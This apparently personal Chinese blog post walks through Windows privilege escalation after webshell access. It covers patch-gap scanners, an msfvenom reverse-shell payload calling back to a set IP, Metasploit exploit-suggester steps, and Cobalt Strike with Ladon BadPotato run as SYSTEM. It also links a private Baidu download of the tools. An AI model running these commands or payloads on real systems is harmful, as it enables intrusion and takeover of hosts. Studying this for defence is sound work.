个人技术分享

目录

思维导图

前置知识

案例一: Web&Win2008-人工手动&全自动msf-筛选&下载&利用

手动

全自动msf

案例二: Web&Win2019-CS 半自动-反弹&插件&利用


思维导图

前置知识

提权方式,这里讲的是溢出漏洞

windows权限

常见步骤:

信息收集--操作系统版本  漏洞补丁  位数  杀软防护  网络  当前权限
可能用到的命令

ver 

systeminfo 

whoami

netstat -an

tasklist /svc

基于补丁和系统版本的位数来进行筛选可用于溢出漏洞exp

-基于手动的提权

-基于cs的半自动提权

-基于msf的全自动化提权

上传exp调用执行去提权

案例一: Web&Win2008-人工手动&全自动msf-筛选&下载&利用

手动

手工测试会有各种原因,例如开发语言,系统环境等虽然漏洞有,但是不能成功

首先是已经上传完了文件

哥斯拉连接目前的用户身份是iis

查看基础信息

然后需要进行未打补丁漏洞的筛选

项目一: GitHub - chroblert/WindowsVulnScan

把该项目中的ps1文件上传到服务器,用powershell运行

利用powershell执行,正常情况下这里已经输出了json文件

但是这里有bug,如何解决?

直接打开文件把信息手动填写进去到json文件当中

json文件需要导入到文件夹下利用python文件去执行

这里就会导出没有打补丁的漏洞编号

项目二:GitHub - vulmon/Vulmap: Vulmap Online Local Vulnerability Scanners Project

该项目对于linux的适配性更高,windows无效,这里也不做过多赘述

项目三:GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation

直接把webshell里面执行的systeminfo里面的内容全选复制到1.txt文件下

利用wes.py文件执行

结果会保存到表格当中

一个windows提权辅助平台:提权辅助网页 Windows提权辅助

页面下面这届会有结果

提权漏洞的exp项目如何寻找:

针对于提权的项目:(可惜已经不更新了)

https://github.com/Ascotbe/KernelHub  

该项目会监控git上所有exp以及poc

GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

 下面就是找到对应exp进行提权

全自动msf

首先生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=106.14.195.29 LPORT=3333 -f exe -o msf.exe

上传到服务器

这个时候msf需要开启监听

use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit

run运行开启监听

运行exe,成功反弹shell(这里如果你是直接在系统中点的获得的是admin权限,真实环境只能用webshell去执行所以获得的是iis权限)

筛选exp模块(这里使用全自动模块)

use post/windows/gather/enum_patches(半自动:根据漏洞编号找出系统中安装的补丁)
use post/multi/recon/local_exploit_suggester(全自动:快速识别系统中可能被利用的漏洞)
background
show options
set session 1
set showdescription true
exploit

执行结果yes代表可以利用的模块

这里利用的是

这里明明有会话,但是不能创建会话,试了很多种方法也没有成功,这里先学习思路把视频中2012也未成功,学习思路即可

有时候反弹不回来可以新开一个窗口,开启监听

案例二: Web&Win2019-CS 半自动-反弹&插件&利用

cs-kali安装

首先部署cs后渗透工具,解压后,启动团队服务

新开窗口启动客户端(密码是刚才设置的,用户名随机)

开启监听

新建一个监听模块

生成后门

生成的后门上传到服务器

利用webshell去执行

cs中上线

需要去加载插件

ladon下载git地址:https://github.com/k8gege/Ladon

下面是我用的,可直接下载,永久有效哦

链接:https://pan.baidu.com/s/1rcsfdojccey-wPrHcx8A2g?pwd=i900
提取码:i900

需要先把sleep改成0秒,默认60秒是为了防止杀毒软件等

进入命令行界面

这里用的提权模块是badpotapo

但是直接点了没什么反应,需要借助命令行

Ladon badpotapo whoami

这里能够提权成功 ,但是只是临时的

这里需要利用这个模块去执行,系统下的反弹shell文件,弹回来的就是system权限

Ladon badpotato "C:\inetpub\wwwroot\artifact.exe"

点击这个按钮可以查看视图